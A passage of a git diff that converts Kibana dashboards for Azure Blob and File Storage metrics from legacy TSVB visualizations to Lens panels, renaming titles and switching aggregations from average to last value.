+ "isVisible": true,
+ "maxLines": 1,
+ "position": "right",
+ "shouldTruncate": true,
+ "showSingleSeries": true
+ },
+ "preferredSeriesType": "bar_stacked",
+ "tickLabelsVisibilitySettings": {
+ "x": true,
+ "yLeft": true,
+ "yRight": true
+ },
+ "valueLabels": "hide",
+ "valuesInLegend": true,
+ "yLeftExtent": {
+ "mode": "full"
+ },
+ "yLeftScale": "linear",
+ "yRightExtent": {
+ "mode": "full"
+ },
+ "yRightScale": "linear"
+ }
 },
- "type": "metrics",
- "data": {
- "aggs": [],
- "searchSource": {}
- }
- }
+ "title": "",
+ "type": "lens",
+ "visualizationType": "lnsXY"
+ },
+ "enhancements": {},
+ "hidePanelTitles": false
 },
- "title": "Success Server Latency"
- },
- {
- "version": "8.3.0",
- "type": "visualization",
 "gridData": {
 "h": 15,
 "i": "756da375-e6a2-4668-af43-0cd294878254",
- "w": 19,
- "x": 29,
- "y": 9
+ "w": 24,
+ "x": 24,
+ "y": 14
 },
 "panelIndex": "756da375-e6a2-4668-af43-0cd294878254",
- "embeddableConfig": {
- "enhancements": {},
- "savedVis": {
- "title": "Storage Success E2E Latency [Azure Metrics]",
- "description": "",
- "uiState": {},
- "params": {
- "axis_formatter": "number",
- "axis_min": 0,
- "axis_position": "left",
- "axis_scale": "normal",
- "filter": {
- "language": "kuery",
- "query": ""
- },
- "id": "da4459b0-32ea-11ea-be35-cb10be813609",
- "index_pattern": "metrics-*",
- "interval": "5m",
- "isModelInvalid": false,
- "series": [
- {
- "axis_position": "right",
- "chart_type": "bar",
- "color": "#3185FC",
- "fill": 0.5,
- "formatter": "number",
- "id": "da4459b1-32ea-11ea-be35-cb10be813609",
- "label": "Success E2E Latency (ms)",
- "line_width": "1",
- "metrics": [
- {
- "field": "azure.storage_account.success_e2elatency.avg",
- "id": "da4459b2-32ea-11ea-be35-cb10be813609",
- "type": "avg"
- }
- ],
- "point_size": 0,
- "separate_axis": 0,
- "split_color_mode": "rainbow",
- "split_mode": "terms",
- "stacked": "none",
- "terms_field": "azure.dimensions.api_name",
- "terms_order_by": "da4459b2-32ea-11ea-be35-cb10be813609",
- "type": "timeseries",
- "value_template": "{{value}} ms"
- }
- ],
- "show_grid": 1,
- "show_legend": 1,
- "time_field": "@timestamp",
- "type": "timeseries",
- "use_kibana_indexes": false,
- "drop_last_bucket": 1
- },
- "type": "metrics",
- "data": {
- "aggs": [],
- "searchSource": {}
- }
- }
- },
- "title": "Success E2E Latency"
+ "title": "Success E2E Latency",
+ "type": "lens",
+ "version": "8.7.0"
 },
 {
- "version": "8.3.0",
- "type": "visualization",
- "gridData": {
- "h": 9,
- "i": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f",
- "w": 5,
- "x": 24,
- "y": 0
- },
- "panelIndex": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f",
 "embeddableConfig": {
- "enhancements": {},
- "savedVis": {
- "title": "Storage Container Count [Azure Metrics]",
- "description": "",
- "uiState": {},
- "params": {
- "axis_formatter": "number",
- "axis_min": 0,
- "axis_position": "left",
- "axis_scale": "normal",
- "background_color": null,
- "background_color_rules": [
- {
- "id": "71978870-32e4-11ea-af9e-d70582a45bda"
+ "attributes": {
+ "references": [],
+ "state": {
+ "adHocDataViews": {
+ "tsvb_ad_hoc_metrics-*/@timestamp": {
+ "allowNoIndex": true,
+ "fieldAttrs": {},
+ "fieldFormats": {},
+ "id": "tsvb_ad_hoc_metrics-*/@timestamp",
+ "name": "metrics-*",
+ "runtimeFieldMap": {},
+ "sourceFilters": [],
+ "timeFieldName": "@timestamp",
+ "title": "metrics-*"
 }
- ],
- "bar_color_rules": [
+ },
+ "datasourceStates": {
+ "formBased": {
+ "layers": {
+ "a88483ec-4907-4b37-932e-c8f321dd4e0f": {
+ "columnOrder": [
+ "7d007119-a64e-4bb9-b766-c98e88020f08",
+ "fd2e7314-5a94-49b1-95b1-c0459f6399b0",
+ "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd"
+ ],
+ "columns": {
+ "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd": {
+ "customLabel": true,
+ "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": ""
+ },
+ "isBucketed": false,
+ "label": "Storage Accounts Egress Total",
+ "operationType": "max",
+ "params": {
+ "emptyAsNull": true,
+ "format": {
+ "id": "bytes"
+ }
+ },
+ "scale": "ratio",
+ "sourceField": "azure.storage_account.egress.total"
+ },
+ "7d007119-a64e-4bb9-b766-c98e88020f08": {
+ "dataType": "date",
+ "isBucketed": true,
+ "label": "@timestamp",
+ "operationType": "date_histogram",
+ "params": {
+ "dropPartials": true,
+ "includeEmptyRows": true,
+ "interval": "auto"
+ },
+ "scale": "interval",
+ "sourceField": "@timestamp"
+ },
+ "fd2e7314-5a94-49b1-95b1-c0459f6399b0": {
+ "dataType": "string",
+ "isBucketed": true,
+ "label": "Top 10 values of azure.dimensions.api_name",
+ "operationType": "terms",
+ "params": {
+ "exclude": [],
+ "excludeIsRegex": false,
+ "include": [],
+ "includeIsRegex": false,
+ "missingBucket": false,
+ "orderBy": {
+ "columnId": "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd",
+ "type": "column"
+ },
+ "orderDirection": "desc",
+ "otherBucket": false,
+ "parentFormat": {
+ "id": "terms"
+ },
+ "secondaryFields": [],
+ "size": 10
+ },
+ "scale": "ordinal",
+ "sourceField": "azure.dimensions.api_name"
+ }
+ },
+ "incompleteColumns": {}
+ }
+ }
+ },
+ "textBased": {
+ "layers": {}
+ }
+ },
+ "filters": [],
+ "internalReferences": [
 {
- "id": "f11cfd90-32e5-11ea-af9e-d70582a45bda"
+ "id": "tsvb_ad_hoc_metrics-*/@timestamp",
+ "name": "indexpattern-datasource-layer-a88483ec-4907-4b37-932e-c8f321dd4e0f",
+ "type": "index-pattern"
 }
 ],
- "drilldown_url": "",
- "filter": {
+ "query": {
 "language": "kuery",
 "query": ""
 },
- "gauge_color_rules": [
- {
- "id": "9c09ed50-32e4-11ea-af9e-d70582a45bda"
- }
- ],
- "gauge_inner_color": null,
- "gauge_inner_width": "6",
- "gauge_style": "circle",
- "gauge_width": "10",
- "hide_last_value_indicator": true,
- "id": "61fb4190-32e4-11ea-b9f8-4d0b340ad993",
- "index_pattern": "metrics-*",
- "interval": "60m",
- "isModelInvalid": false,
- "series": [
- {
- "axis_position": "right",
- "chart_type": "line",
- "color": "rgba(104,188,0,1)",
- "fill": "1.2",
- "filter": {
- "language": "kuery",
- "query": ""
- },
- "formatter": "'0'",
- "id": "61fb4191-32e4-11ea-b9f8-4d0b340ad993",
- "label": "Container Count",
- "line_width": 2,
- "metrics": [
- {
- "field": "azure.storage_account.container_count.avg",
- "id": "61fb4192-32e4-11ea-b9f8-4d0b340ad993",
- "type": "avg"
- }
- ],
- "point_size": 0,
- "separate_axis": 0,
- "split_color_mode": "gradient",
- "split_mode": "everything",
- "stacked": "none",
- "terms_field": "azure.resource.name",
- "terms_order_by": "61fb4192-32e4-11ea-b9f8-4d0b340ad993",
- "type": "timeseries",
- "value_template": "{{value}}"
- }
- ],
- "show_grid": 1,
- "show_legend": 1,
- "time_field": "@timestamp",
- "type": "gauge",
- "use_kibana_indexes": false,
- "drop_last_bucket": 1
+ "visualization": {
+ "axisTitlesVisibilitySettings": {
+ "x": true,
+ "yLeft": false,
+ "yRight": true
+ },
+ "fillOpacity": 0,
+ "fittingFunction": "None",
+ "gridlinesVisibilitySettings": {
+ "x": true,
+ "yLeft": true,
+ "yRight": true
+ },
+ "labelsOrientation": {
+ "x": 0,
+ "yLeft": 0,
+ "yRight": 0
+ },
+ "layers": [
+ {
+ "accessors": [
+ "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd"
+ ],
+ "layerId": "a88483ec-4907-4b37-932e-c8f321dd4e0f",
+ "layerType": "data",
+ "palette": {
+ "name": "default",
+ "type": "palette"
+ },
+ "seriesType": "line",
+ "splitAccessor": "fd2e7314-5a94-49b1-95b1-c0459f6399b0",
+ "xAccessor": "7d007119-a64e-4bb9-b766-c98e88020f08",
+ "yConfig": [
+ {
+ "axisMode": "left",
+ "color": "rgba(0,149,177,1)",
+ "forAccessor": "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd"
+ }
+ ]
+ }
+ ],
+ "legend": {
+ "isVisible": true,
+ "maxLines": 1,
+ "position": "right",
+ "shouldTruncate": true,
+ "showSingleSeries": true
+ },
+ "preferredSeriesType": "bar_stacked",
+ "tickLabelsVisibilitySettings": {
+ "x": true,
+ "yLeft": true,
+ "yRight": true
+ },
+ "valueLabels": "hide",
+ "valuesInLegend": true,
+ "yLeftExtent": {
+ "mode": "full"
+ },
+ "yLeftScale": "linear",
+ "yRightExtent": {
+ "mode": "full"
+ },
+ "yRightScale": "linear"
+ }
 },
- "type": "metrics",
- "data": {
- "aggs": [],
- "searchSource": {}
- }
- }
- }
- },
- {
- "version": "8.3.0",
- "type": "visualization",
+ "title": "Storage Account Egress Traffic",
+ "type": "lens",
+ "visualizationType": "lnsXY"
+ },
+ "enhancements": {},
+ "hidePanelTitles": false
+ },
 "gridData": {
 "h": 14,
 "i": "a715fafc-ca38-410c-9253-12ba506eabc0",
- "w": 20,
- "x": 9,
- "y": 24
+ "w": 24,
+ "x": 0,
+ "y": 29
 },
 "panelIndex": "a715fafc-ca38-410c-9253-12ba506eabc0",
+ "title": "Egress Traffic by APIName",
+ "type": "lens",
+ "version": "8.7.0"
+ },
+ {
 "embeddableConfig": {
- "enhancements": {},
- "savedVis": {
- "title": "Storage Account Egress Traffic [Azure Metrics]",
- "description": "",
- "uiState": {},
- "params": {
- "axis_formatter": "number",
- "axis_min": 0,
- "axis_position": "left",
- "axis_scale": "normal",
- "background_color_rules": [
- {
- "id": "0791c5a0-32d8-11ea-98d2-1194b9f2bfc0"
+ "attributes": {
+ "references": [],
+ "state": {
+ "adHocDataViews": {
+ "tsvb_ad_hoc_metrics-*/@timestamp": {
+ "allowNoIndex": true,
+ "fieldAttrs": {},
+ "fieldFormats": {},
+ "id": "tsvb_ad_hoc_metrics-*/@timestamp",
+ "name": "metrics-*",
+ "runtimeFieldMap": {},
+ "sourceFilters": [],
+ "timeFieldName": "@timestamp",
+ "title": "metrics-*"
 }
- ],
- "bar_color_rules": [
+ },
+ "datasourceStates": {
+ "formBased": {
+ "layers": {
+ "ba544caa-968e-43a4-ad08-778383139364": {
+ "columnOrder": [
+ "08d7ec3c-6bc4-4327-b957-128f9af2c893",
+ "8b3a854f-c648-4b43-96f6-e3c5fdc02aae",
+ "cbf67182-5598-4083-9e67-f0118755f9e2"
+ ],
+ "columns": {
+ "08d7ec3c-6bc4-4327-b957-128f9af2c893": {
+ "dataType": "date",
+ "isBucketed": true,
+ "label": "@timestamp",
+ "operationType": "date_histogram",
+ "params": {
+ "dropPartials": true,
+ "includeEmptyRows": true,
+ "interval": "auto"
+ },
+ "scale": "interval",
+ "sourceField": "@timestamp"
+ },
+ "8b3a854f-c648-4b43-96f6-e3c5fdc02aae": {
+ "dataType": "string",
+ "isBucketed": true,
+ "label": "Top 10 values of azure.dimensions.api_name",
+ "operationType": "terms",
+ "params": {
+ "exclude": [],
+ "excludeIsRegex": false,
+ "include": [],
+ "includeIsRegex": false,
+ "missingBucket": false,
+ "orderBy": {
+ "columnId": "cbf67182-5598-4083-9e67-f0118755f9e2",
+ "type": "column"
+ },
+ "orderDirection": "desc",
+ "otherBucket": false,
+ "parentFormat": {
+ "id": "terms"
+ },
+ "secondaryFields": [],
+ "size": 10
+ },
+ "scale": "ordinal",
+ "sourceField": "azure.dimensions.api_name"
+ },
+ "cbf67182-5598-4083-9e67-f0118755f9e2": {
+ "customLabel": true,
+ "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": ""
+ },
+ "isBucketed": false,
+ "label": "Storage Accounts Ingress Total",
+ "operationType": "max",
+ "params": {
+ "emptyAsNull": true,
+ "format": {
+ "id": "bytes"
+ }
+ },
+ "scale": "ratio",
+ "sourceField": "azure.storage_account.ingress.total"
+ }
+ },
+ "incompleteColumns": {}
+ }
+ }
+ },
+ "textBased": {
+ "layers": {}
+ }
+ },
+ "filters": [],
+ "internalReferences": [
 {
- "id": "fca016e0-32de-11ea-a435-e7199eba380d"
+ "id": "tsvb_ad_hoc_metrics-*/@timestamp",
+ "name": "indexpattern-datasource-layer-ba544caa-968e-43a4-ad08-778383139364",
+ "type": "index-pattern"
 }
 ],
- "filter": {
+ "query": {
 "language": "kuery",
 "query": ""
 },
- "gauge_color_rules": [
- {
- "id": "fb8be7c0-32de-11ea-a435-e7199eba380d"
- }
- ],
- "gauge_inner_width": 10,
- "gauge_style": "half",
- "gauge_width": 10,
- "id": "f0edca80-32d5-11ea-b19d-fb5049b980ca",
- "index_pattern": "metrics-*",
- "interval": "5m",
- "isModelInvalid": false,
- "series": [
- {
- "axis_position": "right",
- "chart_type": "line",
- "color": "rgba(0,149,177,1)",
- "fill": 0,
- "filter": {
- "language": "kuery",
- "query": ""
- },
- "formatter": "bytes",
- "hidden": false,
- "id": "f0edf190-32d5-11ea-b19d-fb5049b980ca",
- "label": "Storage Accounts Egress Total",
- "line_width": 2,
- "metrics": [
- {
- "field": "azure.storage_account.egress.total",
- "id": "f0edf191-32d5-11ea-b19d-fb5049b980ca",
- "type": "max"
- }
- ],
- "point_size": 0,
- "separate_axis": 0,
- "split_color_mode": "gradient",
- "split_filters": [
- {
- "color": "rgba(0,98,177,1)",
- "filter": {
- "language": "kuery",
- "query": ""
- },
- "id": "283dc410-32d9-11ea-98d2-1194b9f2bfc0"
- }
- ],
- "split_mode": "terms",
- "stacked": "none",
- "terms_field": "azure.dimensions.api_name",
- "terms_order_by": "f0edf191-32d5-11ea-b19d-fb5049b980ca",
- "type": "timeseries",
- "value_template": "{{value}}"
- }
- ],
- "show_grid": 1,
- "show_legend": 1,
- "time_field": "@timestamp",
- "type": "timeseries",
- "use_kibana_indexes": false,
- "drop_last_bucket": 1
+ "visualization": {
+ "axisTitlesVisibilitySettings": {
+ "x": true,
+ "yLeft": false,
+ "yRight": true
+ },
+ "fillOpacity": 0,
+ "fittingFunction": "None",
+ "gridlinesVisibilitySettings": {
+ "x": true,
+ "yLeft": true,
+ "yRight": true
+ },
+ "labelsOrientation": {
+ "x": 0,
+ "yLeft": 0,
+ "yRight": 0
+ },
+ "layers": [
+ {
+ "accessors": [
+ "cbf67182-5598-4083-9e67-f0118755f9e2"
+ ],
+ "layerId": "ba544caa-968e-43a4-ad08-778383139364",
+ "layerType": "data",
+ "palette": {
+ "name": "default",
+ "type": "palette"
+ },
+ "seriesType": "line",
+ "splitAccessor": "8b3a854f-c648-4b43-96f6-e3c5fdc02aae",
+ "xAccessor": "08d7ec3c-6bc4-4327-b957-128f9af2c893",
+ "yConfig": [
+ {
+ "axisMode": "left",
+ "color": "rgba(104,188,0,1)",
+ "forAccessor": "cbf67182-5598-4083-9e67-f0118755f9e2"
+ }
+ ]
+ }
+ ],
+ "legend": {
+ "isVisible": true,
+ "maxLines": 1,
+ "position": "right",
+ "shouldTruncate": true,
+ "showSingleSeries": true
+ },
+ "preferredSeriesType": "bar_stacked",
+ "tickLabelsVisibilitySettings": {
+ "x": true,
+ "yLeft": true,
+ "yRight": true
+ },
+ "valueLabels": "hide",
+ "valuesInLegend": true,
+ "yLeftExtent": {
+ "mode": "full"
+ },
+ "yLeftScale": "linear",
+ "yRightExtent": {
+ "mode": "full"
+ },
+ "yRightScale": "linear"
+ }
 },
- "type": "metrics",
- "data": {
- "aggs": [],
- "searchSource": {}
- }
- }
+ "title": "Storage Account Ingress Traffic",
+ "type": "lens",
+ "visualizationType": "lnsXY"
+ },
+ "enhancements": {},
+ "hidePanelTitles": false
 },
- "title": "Egress Traffic by APIName"
- },
- {
- "version": "8.3.0",
- "type": "visualization",
 "gridData": {
 "h": 14,
 "i": "75f72920-be71-47a9-a967-f1c862ab2961",
- "w": 19,
- "x": 29,
- "y": 24
+ "w": 24,
+ "x": 24,
+ "y": 29
 },
 "panelIndex": "75f72920-be71-47a9-a967-f1c862ab2961",
- "embeddableConfig": {
- "enhancements": {},
- "savedVis": {
- "title": "Storage Account Ingress Traffic [Azure Metrics]",
- "description": "",
- "uiState": {},
- "params": {
- "axis_formatter": "number",
- "axis_min": 0,
- "axis_position": "left",
- "axis_scale": "normal",
- "background_color_rules": [
- {
- "id": "0791c5a0-32d8-11ea-98d2-1194b9f2bfc0"
- }
- ],
- "bar_color_rules": [
- {
- "id": "fca016e0-32de-11ea-a435-e7199eba380d"
- }
- ],
- "filter": {
- "language": "kuery",
- "query": ""
- },
- "gauge_color_rules": [
- {
- "id": "fb8be7c0-32de-11ea-a435-e7199eba380d"
- }
- ],
- "gauge_inner_width": 10,
- "gauge_style": "half",
- "gauge_width": 10,
- "id": "f0edca80-32d5-11ea-b19d-fb5049b980ca",
- "index_pattern": "metrics-*",
- "interval": "5m",
- "isModelInvalid": false,
- "series": [
- {
- "axis_position": "right",
- "chart_type": "line",
- "color": "rgba(104,188,0,1)",
- "fill": 0,
- "filter": {
- "language": "kuery",
- "query": ""
- },
- "formatter": "bytes",
- "hidden": false,
- "id": "f0edf190-32d5-11ea-b19d-fb5049b980ca",
- "label": "Storage Accounts Ingress Total",
- "line_width": 2,
- "metrics": [
- {
- "field": "azure.storage_account.ingress.total",
- "id": "f0edf191-32d5-11ea-b19d-fb5049b980ca",
- "type": "max"
- }
- ],
- "point_size": 0,
- "separate_axis": 0,
- "split_color_mode": "gradient",
- "split_filters": [
- {
- "color": "rgba(0,98,177,1)",
- "filter": {
- "language": "kuery",
- "query": ""
- },
- "id": "283dc410-32d9-11ea-98d2-1194b9f2bfc0"
- }
- ],
- "split_mode": "terms",
- "stacked": "none",
- "terms_field": "azure.dimensions.api_name",
- "terms_order_by": "f0edf191-32d5-11ea-b19d-fb5049b980ca",
- "type": "timeseries",
- "value_template": "{{value}}"
- }
- ],
- "show_grid": 1,
- "show_legend": 1,
- "time_field": "@timestamp",
- "type": "timeseries",
- "use_kibana_indexes": false,
- "drop_last_bucket": 1
- },
- "type": "metrics",
- "data": {
- "aggs": [],
- "searchSource": {}
- }
- }
- },
- "title": "Ingress Traffic by APIName"
+ "title": "Ingress Traffic by APIName",
+ "type": "lens",
+ "version": "8.7.0"
 }
 ],
 "timeRestore": false,
 "title": "[Azure Metrics] Blob Storage Overview",
 "version": 1
 },
+ "coreMigrationVersion": "8.7.0",
+ "created_at": "2024-04-01T13:06:26.269Z",
+ "id": "azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc",
+ "migrationVersion": {
+ "dashboard": "8.7.0"
+ },
 "references": [
 {
 "id": "metrics-*",
@@ -1015,23 +1641,20 @@
 "type": "index-pattern"
 },
 {
- "type": "index-pattern",
- "name": "ff6441f8-d66d-4399-bae5-25d3d861b299:control_0_index_pattern",
- "id": "metrics-*"
+ "id": "metrics-*",
+ "name": "controlGroup_7eb82f60-7b2e-473f-960b-35b3fa5392d5:optionsListDataView",
+ "type": "index-pattern"
 },
 {
- "type": "index-pattern",
- "name": "ff6441f8-d66d-4399-bae5-25d3d861b299:control_1_index_pattern",
- "id": "metrics-*"
+ "id": "metrics-*",
+ "name": "controlGroup_269e473e-2b24-402e-9721-3c9b3bd85458:optionsListDataView",
+ "type": "index-pattern"
 },
 {
- "type": "index-pattern",
- "name": "ff6441f8-d66d-4399-bae5-25d3d861b299:control_2_index_pattern",
- "id": "metrics-*"
+ "id": "metrics-*",
+ "name": "controlGroup_192cb16e-8bf4-4e63-b95c-338b8fc0fcfa:optionsListDataView",
+ "type": "index-pattern"
 }
 ],
- "migrationVersion": {
- "dashboard": "8.3.0"
- },
- "coreMigrationVersion": "8.3.0"
+ "type": "dashboard"
 }
\ No newline at end of file
diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json
index aa4a43f0884..55081c6f8a3 100644
--- a/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json
+++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json
@@ -49,6 +49,7 @@
 {
 "embeddableConfig": {
 "enhancements": {},
+ "hidePanelTitles": false,
 "savedVis": {
 "data": {
 "aggs": [],
@@ -66,7 +67,7 @@
 "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [**File**](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ",
 "openLinksInNewTab": false
 },
- "title": "Navigation File Storage Overview [Azure Metrics]",
+ "title": "Navigation File Storage Overview",
 "type": "markdown",
 "uiState": {}
 }
@@ -79,6 +80,7 @@
 "y": 0
 },
 "panelIndex": "ee131d2d-7ab5-4434-9e3b-230759c3e5ff",
+ "title": "Navigation File Storage Overview",
 "type": "visualization",
 "version": "8.7.0"
 },
@@ -114,10 +116,10 @@
 "12c42888-d32f-44da-a61d-84c1f18bdeef": {
 "dataType": "number",
 "isBucketed": false,
- "label": "overall_max(average(azure.storage_account.file_capacity.avg))",
+ "label": "overall_max(last_value(azure.storage_account.file_capacity.avg))",
 "operationType": "formula",
 "params": {
- "formula": "overall_max(average(azure.storage_account.file_capacity.avg))",
+ "formula": "overall_max(last_value(azure.storage_account.file_capacity.avg))",
 "isFormulaBroken": false
 },
 "references": [
@@ -128,11 +130,15 @@
 "12c42888-d32f-44da-a61d-84c1f18bdeefX0": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.file_capacity.avg: *"
+ },
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_capacity.avg))",
- "operationType": "average",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_capacity.avg))",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": false
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_capacity.avg"
@@ -141,7 +147,7 @@
 "customLabel": true,
 "dataType": "number",
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_capacity.avg))",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_capacity.avg))",
 "operationType": "overall_max",
 "references": [
 "12c42888-d32f-44da-a61d-84c1f18bdeefX0"
@@ -157,12 +163,12 @@
 },
 "isBucketed": false,
 "label": "File Capacity",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "bytes"
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_capacity.avg"
@@ -196,7 +202,7 @@
 "metricAccessor": "84db5c1c-ec68-45ed-a47e-28cffd3de24a"
 }
 },
- "title": "Storage File Capacity [Azure Metrics] (converted)",
+ "title": "Storage File Capacity",
 "type": "lens",
 "visualizationType": "lnsMetric"
 },
@@ -211,7 +217,7 @@
 "y": 5
 },
 "panelIndex": "b24e3e0d-a748-4bb9-ad71-e0de392e2696",
- "title": "Storage File Capacity [Azure Metrics]",
+ "title": "Storage File Capacity",
 "type": "lens",
 "version": "8.7.0"
 },
@@ -253,12 +259,12 @@
 },
 "isBucketed": false,
 "label": "File Count",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "number"
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_count.avg"
@@ -266,10 +272,10 @@
 "9f5ac963-172f-4634-9a08-251dffc2537d": {
 "dataType": "number",
 "isBucketed": false,
- "label": "overall_max(average(azure.storage_account.file_count.avg))",
+ "label": "overall_max(last_value(azure.storage_account.file_count.avg))",
 "operationType": "formula",
 "params": {
- "formula": "overall_max(average(azure.storage_account.file_count.avg))",
+ "formula": "overall_max(last_value(azure.storage_account.file_count.avg))",
 "isFormulaBroken": false
 },
 "references": [
@@ -280,11 +286,15 @@
 "9f5ac963-172f-4634-9a08-251dffc2537dX0": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.file_count.avg: *"
+ },
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_count.avg))",
- "operationType": "average",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_count.avg))",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": false
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_count.avg"
@@ -293,7 +303,7 @@
 "customLabel": true,
 "dataType": "number",
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_count.avg))",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_count.avg))",
 "operationType": "overall_max",
 "references": [
 "9f5ac963-172f-4634-9a08-251dffc2537dX0"
@@ -329,7 +339,7 @@
 "metricAccessor": "23858a4e-1e42-4904-83a2-ed6e49295ba2"
 }
 },
- "title": "Storage File Count [Azure Metrics] (converted)",
+ "title": "Storage File Count",
 "type": "lens",
 "visualizationType": "lnsMetric"
 },
@@ -344,7 +354,7 @@
 "y": 5
 },
 "panelIndex": "8131dfcd-2c52-4641-8259-2f4f2e7558d0",
- "title": "Storage File Count [Azure Metrics]",
+ "title": "Storage File Count",
 "type": "lens",
 "version": "8.7.0"
 },
@@ -380,10 +390,10 @@
 "062f829c-7c18-40ba-8284-fd5a58c25a8a": {
 "dataType": "number",
 "isBucketed": false,
- "label": "overall_max(average(azure.storage_account.file_share_count.avg))",
+ "label": "overall_max(last_value(azure.storage_account.file_share_count.avg))",
 "operationType": "formula",
 "params": {
- "formula": "overall_max(average(azure.storage_account.file_share_count.avg))",
+ "formula": "overall_max(last_value(azure.storage_account.file_share_count.avg))",
 "isFormulaBroken": false
 },
 "references": [
@@ -394,11 +404,15 @@
 "062f829c-7c18-40ba-8284-fd5a58c25a8aX0": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.file_share_count.avg: *"
+ },
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_share_count.avg))",
- "operationType": "average",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_share_count.avg))",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": false
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_share_count.avg"
@@ -407,7 +421,7 @@
 "customLabel": true,
 "dataType": "number",
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_share_count.avg))",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_share_count.avg))",
 "operationType": "overall_max",
 "references": [
 "062f829c-7c18-40ba-8284-fd5a58c25a8aX0"
@@ -423,12 +437,12 @@
 },
 "isBucketed": false,
 "label": "File Share Count",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "number"
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_share_count.avg"
@@ -462,7 +476,7 @@
 "metricAccessor": "22f058a6-1825-4063-8158-d90762047b37"
 }
 },
- "title": "Storage File Share Count [Azure Metrics] (converted)",
+ "title": "Storage File Share Count",
 "type": "lens",
 "visualizationType": "lnsMetric"
 },
@@ -477,7 +491,7 @@
 "y": 5
 },
 "panelIndex": "49233089-be1d-4cda-9ccf-2815152e1016",
- "title": "Storage File Share Count [Azure Metrics]",
+ "title": "Storage File Share Count",
 "type": "lens",
 "version": "8.7.0"
 },
@@ -511,18 +525,22 @@
 "a7b1928f-ce2c-43ff-b945-a6b419d9b760": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.availability.avg: *"
+ },
 "isBucketed": false,
 "label": "Availability",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "number",
 "params": {
 "decimals": 1,
 "suffix": " %"
 }
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.availability.avg"
@@ -535,7 +553,7 @@
 "params": {
 "dropPartials": false,
 "includeEmptyRows": true,
- "interval": "5m"
+ "interval": "auto"
 },
 "scale": "interval",
 "sourceField": "@timestamp"
@@ -626,7 +644,7 @@
 "yRightScale": "linear"
 }
 },
- "title": "Storage Availability [Azure Metrics] (converted)",
+ "title": "Storage Availability",
 "type": "lens",
 "visualizationType": "lnsXY"
 },
@@ -707,7 +725,7 @@
 "params": {
 "dropPartials": true,
 "includeEmptyRows": true,
- "interval": "5m"
+ "interval": "auto"
 },
 "scale": "interval",
 "sourceField": "@timestamp"
@@ -811,7 +829,7 @@
 "yRightScale": "linear"
 }
 },
- "title": "Storage Transactions [Azure Metrics] (converted)",
+ "title": "Storage Transactions",
 "type": "lens",
 "visualizationType": "lnsXY"
 },
@@ -862,10 +880,10 @@
 "9d4a0ed0-f231-4462-a164-0babab6e282b": {
 "dataType": "number",
 "isBucketed": false,
- "label": "overall_max(average(azure.storage_account.file_share_snapshot_count.avg))",
+ "label": "overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))",
 "operationType": "formula",
 "params": {
- "formula": "overall_max(average(azure.storage_account.file_share_snapshot_count.avg))",
